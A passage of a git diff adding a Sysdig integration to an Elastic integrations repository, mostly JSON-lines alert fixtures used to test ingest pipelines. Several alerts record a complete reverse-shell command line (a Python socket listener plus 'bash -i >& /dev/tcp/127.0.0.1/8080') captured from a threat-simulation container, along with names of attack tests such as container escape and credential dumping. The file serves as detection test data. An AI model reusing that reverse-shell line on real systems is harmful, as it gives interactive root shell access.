0\u003e\u00261","proc.pid":"2140103","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17e047935c2a5c6118242ab739a6ba5e","type":"audittrail","timestamp":1720453755887574113,"timestampRFC3339Nano":"2024-07-08T15:49:15.887574113Z","originator":"ingestion","category":"","source":"auditTrail","name":"","description":"","severity":0,"containerId":"","machineId":""} +{"id":"17e047939adc188d8ee67f27d98a5929","type":"audittrail","timestamp":1720453756939409549,"timestampRFC3339Nano":"2024-07-08T15:49:16.939409549Z","originator":"ingestion","category":"","source":"auditTrail","name":"","description":"","severity":0,"containerId":"","machineId":""} +{"id":"17e047be24848be2ae63efba47ac8869","agentId":57228830,"containerId":"","type":"connection","timestamp":1720453939637554200,"timestampRFC3339Nano":"2024-07-08T15:52:19.637554146Z","labels":{"host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk"}} +{"id":"17dec38d1ccc838ed8bd3c0690c2a92e","agentId":57841425,"containerId":"","type":"connection","timestamp":1720027118543078400,"timestampRFC3339Nano":"2024-07-03T17:18:38.543078286Z","labels":{"host.hostName":"gke-gke-aliances-test-pa-default-pool-edcdf365-obof"}} +{"id":"17dec30f432914be51fde04f0a93ff8f","agentId":58462617,"containerId":"1eb848eba226","type":"command","timestamp":1720026578020799700,"timestampRFC3339Nano":"2024-07-03T17:09:38.020799678Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} +{"id":"17dec30ec6c62db90219722f069818ce","agentId":58462617,"containerId":"1eb848eba226","type":"command","timestamp":1720026575933943300,"timestampRFC3339Nano":"2024-07-03T17:09:35.933943225Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} +{"id":"17dec311bcc23cdab41a9d1b874f923f","agentId":58462617,"containerId":"1eb848eba226","type":"fileaccess","timestamp":1720026588650814700,"timestampRFC3339Nano":"2024-07-03T17:09:48.650814682Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} +{"id":"164806f4c47ad9101117d87f8b574ecf","agentId":32212,"containerId":"397be1762fba","name":"nginx-76f9cf7469-k5kf7","timestamp":1606322948648718268,"timestampRFC3339Nano":"2020-11-25T16:49:08.648718268Z","type":"kubernetes","labels":{"host.hostName":"qa-k8smetrics","kubernetes.cluster.name":"demo-env-prom","kubernetes.namespace.name":"nginx","kubernetes.pod.name":"nginx-76f9cf7469-k5kf7"}} \ No newline at end of file diff --git a/packages/sysdig/changelog.yml b/packages/sysdig/changelog.yml new file mode 100644 index 00000000000..8e5f51ff8cb --- /dev/null +++ b/packages/sysdig/changelog.yml @@ -0,0 +1,6 @@ +# newer versions go on top +- version: "0.1.0" + changes: + - description: Initial release of the Sysdig integration + type: enhancement + link: https://github.com/elastic/integrations/pull/10841 diff --git a/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log b/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log new file mode 100644 index 00000000000..fb8957ca56d --- /dev/null +++ b/packages/sysdig/data_stream/alerts/_dev/test/pipeline/test-sysdig.log @@ -0,0 +1,15 @@ +{"id":"17dec715376910362c8c3f62a4ceda2e","type":"policy","timestamp":1720031001639981110,"timestampRFC3339Nano":"2024-07-03T18:23:21.63998111Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Activity Logs","description":"This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.","severity":7,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","content":{"ruleName":"User Management Event Detected","ruleType":"RULE_TYPE_FALCO","ruleTags":["host","container","MITRE","MITRE_TA0003_persistence","MITRE_T1136_create_account","MITRE_T1136.001_create_account_local_account","MITRE_T1070_indicator_removal","MITRE_TA0005_defense_evasion","MITRE_TA0040_impact","MITRE_T1531_account_access_removal","MITRE_T1098_account_manipulation"],"output":"Users management command userdel tmp_suid_user launched by pwsh on threatgen under user root (proc.name=userdel proc.args=tmp_suid_user fd.name=\u003cNA\u003e proc.cmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.pname=pwsh gparent=containerd-shim ggparent=\u003cNA\u003e gggparent=\u003cNA\u003e container=container_id=6949e5f10829 container_name=threatgen evt.type=execve evt.arg.request=\u003cNA\u003e proc.pid=2140169 proc.cwd=/tmp/ proc.ppid=2140088 proc.pcmdline=pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC) proc.sid=1 proc.exepath=/usr/sbin/userdel user.uid=0 user.loginuid=-1 user.loginname=\u003cNA\u003e user.name=root group.gid=0 group.name=root container.id=6949e5f10829 container.name=threatgen image=docker.io/dockerbadboy/art)","fields":{"container.name":"threatgen","proc.cmdline":"userdel tmp_suid_user","proc.cwd":"/tmp/","proc.exepath":"/usr/sbin/userdel","proc.name":"userdel","proc.pcmdline":"pwsh -c (./RunTests.ps1 STDIN.NETWORK DEV.SHM.EXEC T1048 RECON.FIND.SUID T1611.002 CONTAINER.ESCAPE.NSENTER CREDS.DUMP.MEMORY KILL.MALICIOUS.PROC LOAD.BPF.PROG Base64.PYTHON BASE64.CLI CONNECT.UNEXPECTED RECON.GPG SUBTERFUGE.LASTLOG LD.LINUX.EXEC LD.SO.PRELOAD USERFAULTFD.HANDLER RECON.LINPEAS PROOT.EXEC)","proc.pid":"2140169","proc.pname":"pwsh","proc.ppid":"2140088","user.name":"root","user.uid":"0"},"policyVersion":35,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec7142e0084978fbafcb03e2cabca","type":"policy","timestamp":1720030997187167383,"timestampRFC3339Nano":"2024-07-03T18:23:17.187167383Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"c708ed01-9700-4787-91a5-6b2fb9863c0a","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=1 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17e04791d768c4aba1e9c40d944b8598","type":"policy","timestamp":1720453749365327019,"timestampRFC3339Nano":"2024-07-08T15:49:09.365327019Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Activity Logs","description":"This policy contains rules which provide a greater insight into general activities occuring on the system. They are very noisy, but useful in threat hunting situations if you are looking for specific actions being taken during runtime. It is not recommended to use this policy for detection purposes unless tuning is enabled. Additional manual tuning will likely be required.","severity":7,"agentId":58462623,"containerId":"8736272bd5fb","machineId":"7c:1e:52:0b:2b:61","hostMac":"7c:1e:52:0b:2b:61","content":{"ruleName":"Drop and execute new binary in container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","MITRE","MITRE_T1525_implant_internal_image","MITRE_TA0003_persistence"],"output":"Executing binary ruby with parent livenessprobe.s not part of base image mcr.microsoft.com/azuremonitor/containerinsights/ciprod on ama-logs under user root and execution path /usr/bin/ruby (proc.name=ruby proc.pname=livenessprobe.s fd.name=\\u003cNA\\u003e proc.cmdline=ruby /opt/dcr-config-parser.rb proc.pcmdline=livenessprobe.s /opt/livenessprobe.sh gparent=runc ggparent=containerd-shim gggparent=systemd evt.type=execveproc.args=/opt/dcr-config-parser.rb proc.pid=2817268 proc.cwd=/opt/ proc.ppid=2817253 proc.exepath=/usr/bin/ruby user.uid=0 user.loginuid=-1 user.loginname=\\u003cNA\\u003e user.name=root group.gid=0 group.name=root container.id=8736272bd5fb container.name=ama-logs image=mcr.microsoft.com/azuremonitor/containerinsights/ciprod:3.1.21)","fields":{"container.name":"ama-logs","proc.cmdline":"ruby /opt/dcr-config-parser.rb","proc.cwd":"/opt/","proc.exepath":"/usr/bin/ruby","proc.name":"ruby","proc.pcmdline":"livenessprobe.s /opt/livenessprobe.sh","proc.pid":"2817268","proc.pname":"livenessprobe.s","proc.ppid":"2817253","user.name":"root","user.uid":"0"},"policyVersion":35,"policyOrigin":"Sysdig"},"labels":{"azure.instanceId":"ba53fc47-1119-4cbb-af2b-6d38b0e56160","azure.instanceName":"aks-userpool-12996081-vmss_1","azure.instanceSize":"Standard_D8ds_v5","cloudProvider.account.id":"7a100e05-8316-474d-99c0-b824d0e86366","cloudProvider.name":"azure","cloudProvider.region":"eastus","host.hostName":"aks-userpool-12996081-vmss000001","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"kube-system","kubernetes.pod.name":"ama-logs-cxhbd","kubernetes.workload.type":"daemonset"}} +{"id":"17dec7142e00a9068fb9185f9aa66c21","type":"policy","timestamp":1720030997187176710,"timestampRFC3339Nano":"2024-07-03T18:23:17.18717671Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"eb2b3e3c-ebc1-433f-88c7-2e032b75aadc","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process bash with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=bash parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/bash user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec36048564c002c559dbdad20be41","type":"policy","timestamp":1720026926000000000,"timestampRFC3339Nano":"2024-07-03T17:15:26Z","originator":"policy","category":"remote","source":"aws_cloudtrail","name":"Describe Instances - Sysdig AWS Activity Logs","description":"A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)","severity":7,"containerId":"","machineId":"","content":{"ruleName":"Describe Instances","ruleType":"RULE_TYPE_FALCO","ruleTags":["MITRE_T1082_system_information_discovery","Cloud","AWS","AWS_EC2","MITRE","MITRE_TA0007_discovery","MITRE_T1580_cloud_infrastructure_discovery"],"output":"A description of an EC2 instance has been requested by user AutoScaling on region us-east-1 (requesting user=AutoScaling, requesting IP=autoscaling.amazonaws.com, account ID=414773805239, AWS region=us-east-1)","fields":{"container.name":""},"policyVersion":36,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"414773805239","cloudProvider.name":"aws","cloudProvider.region":"us-east-1"}} +{"id":"17dec7142e051355585daf677e472ed2","type":"policy","timestamp":1720030997187466069,"timestampRFC3339Nano":"2024-07-03T18:23:17.187466069Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"81618044-80a5-44af-b27a-46acead3a4bc","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Privileged Shell Spawned Inside Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","shell","SOC2","SOC2_CC6.1","PCI","PCI_DSS","PCI_DSS_10.1","PCI_DSS_10.2.1","NIST","NIST_800-171","NIST_800-171_3.1.1","NIST_800-171_3.1.2","NIST_800-171_3.14.6","NIST_800-171_3.3.1","NIST_800-171_3.3.2","NIST_800-53","NIST_800-53_AC-17","NIST_800-53_AU-6(8)","NIST_800-53_AU-2","NIST_800-53_AC-2(4)","FedRAMP","FedRAMP_AC-2(4)","FedRAMP_AU-2","ISO","ISO_27001","ISO_27001_A.9.4.4","HIPAA","HIPAA_164.308(a)","HIPAA_164.310(b)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.i","HITRUST_CSF_01.j","HITRUST_CSF_01.n","HITRUST_CSF_01.p","HITRUST_CSF_01.s","HITRUST_CSF_01.y","HITRUST_CSF_06.i","HITRUST_CSF_09.aa","HITRUST_CSF_09.ab","HITRUST_CSF_09.ad","HITRUST_CSF_09.ae","HITRUST_CSF_09.m","HITRUST_CSF_09.s","GDPR","GDPR_32.1","GDPR_32.2","MITRE","MITRE_T1609_container_administration_command","MITRE_TA0002_execution","MITRE_TA0004_privilege_escalation","MITRE_T1068_exploitation_for_privilege_escalation","CIS"],"output":"Privileged Shell Spawned in Container threatgen with image docker.io/dockerbadboy/art by parent bash with cmdline bash -i under user root (user.uid=0 proc.cmdline=bash -i proc.name=bash proc.pname=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 user.name=root user.loginuid=-1 proc.args=-i container.name=threatgen evt.type=execve evt.res=SUCCESS proc.pid=2140105 proc.cwd=/tmp/ proc.ppid=2140101 proc.sid=1 proc.exepath=/usr/bin/bash user.loginname=\u003cNA\u003e group.gid=0 group.name=root, container.image=docker.io/dockerbadboy/art)","fields":{"container.name":"threatgen","proc.cmdline":"bash -i","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/bash","proc.name":"bash","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140105","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17dec7142e03c2766a36e7950883c5c4","type":"policy","timestamp":1720030997187379830,"timestampRFC3339Nano":"2024-07-03T18:23:17.18737983Z","originator":"policy","category":"runtime","source":"syscall","name":"Sysdig Runtime Notable Events","description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","severity":5,"agentId":58014837,"containerId":"6949e5f10829","machineId":"42:01:0a:80:00:05","hostMac":"42:01:0a:80:00:05","actions":[{"type":"","successful":false,"errMsg":"maximum number of outstanding captures (1) reached","token":"35cf0ae3-a4ed-4c00-831f-f0b7c8489718","afterEventNs":30000000000,"beforeEventNs":15000000000}],"content":{"ruleName":"Redirect STDOUT/STDIN to Network Connection in Container","ruleType":"RULE_TYPE_FALCO","ruleTags":["container","SOC2","SOC2_CC6.6","SOC2_CC6.7","NIST","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","MITRE","MITRE_TA0002_execution","MITRE_T1059_command_and_scripting_interpreter","MITRE_T1104_multi_stage_channels"],"output":"Redirect stdout/stdin to network connection by process python3 with parent bash on threatgen under user root, possible reverse shell detected (fd.sip=127.0.0.1:8080 process=python3 parent=bash gparent=pwsh ggparent=containerd-shim gggparent=\u003cNA\u003e container.id=6949e5f10829 image=docker.io/dockerbadboy/art fd.name=127.0.0.1:39552-\u003e127.0.0.1:8080 fd.num=0 fd.type=ipv4 cmdline=python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close(); terminal=0 evt.type=dup2 evt.res=SUCCESS proc.pid=2140103 proc.cwd=/tmp/ proc.ppid=2140101 proc.pcmdline=bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261 proc.sid=1 proc.exepath=/usr/bin/python3.10 user.uid=0 user.loginname=\u003cNA\u003e group.gid=0 group.name=root container.name=threatgen user.name=root user.loginuid=-1 container_id=6949e5f10829 container_name=threatgen)","fields":{"container.name":"threatgen","proc.cmdline":"python3 -c import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();","proc.cwd":"/tmp/","proc.exepath":"/usr/bin/python3.10","proc.name":"python3","proc.pcmdline":"bash -c python3 -c 'import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind((\"127.0.0.1\",8080));s.listen(5);c,a=s.accept();os.dup2(c.fileno(),0);s.close();' \u0026 sleep 1 \u0026\u0026 bash -i \u003e\u0026 /dev/tcp/127.0.0.1/8080 0\u003e\u00261","proc.pid":"2140103","proc.pname":"bash","proc.ppid":"2140101","user.name":"root","user.uid":"0"},"policyVersion":90,"policyOrigin":"Sysdig"},"labels":{"cloudProvider.account.id":"289645096542","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","gcp.availabilityZone":"us-central1-c","gcp.instanceId":"648229130641697246","gcp.instanceName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","gcp.machineType":"e2-standard-4","gcp.projectId":"289645096542","gcp.projectName":"alliances-chronicle","host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-vd1o","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.namespace.name":"default","kubernetes.pod.name":"threatgen-c65cf6446-5s8kk","kubernetes.workload.type":"deployment"}} +{"id":"17e047935c2a5c6118242ab739a6ba5e","type":"audittrail","timestamp":1720453755887574113,"timestampRFC3339Nano":"2024-07-08T15:49:15.887574113Z","originator":"ingestion","category":"","source":"auditTrail","name":"","description":"","severity":0,"containerId":"","machineId":""} +{"id":"17e047939adc188d8ee67f27d98a5929","type":"audittrail","timestamp":1720453756939409549,"timestampRFC3339Nano":"2024-07-08T15:49:16.939409549Z","originator":"ingestion","category":"","source":"auditTrail","name":"","description":"","severity":0,"containerId":"","machineId":""} +{"id":"17e047be24848be2ae63efba47ac8869","agentId":57228830,"containerId":"","type":"connection","timestamp":1720453939637554200,"timestampRFC3339Nano":"2024-07-08T15:52:19.637554146Z","labels":{"host.hostName":"gke-cluster-gcp-demo-san-default-pool-66250c41-mbxk"}} +{"id":"17dec38d1ccc838ed8bd3c0690c2a92e","agentId":57841425,"containerId":"","type":"connection","timestamp":1720027118543078400,"timestampRFC3339Nano":"2024-07-03T17:18:38.543078286Z","labels":{"host.hostName":"gke-gke-aliances-test-pa-default-pool-edcdf365-obof"}} +{"id":"17dec30f432914be51fde04f0a93ff8f","agentId":58462617,"containerId":"1eb848eba226","type":"command","timestamp":1720026578020799700,"timestampRFC3339Nano":"2024-07-03T17:09:38.020799678Z","labels":{"host.hostName":"aks-userpool-12996081-vmss000000","kubernetes.cluster.name":"servicenow-test-cluster","kubernetes.namespace.name":"default","kubernetes.pod.name":"playground-86dfdc6cb5-42xgq","kubernetes.workload.type":"deployment"}} 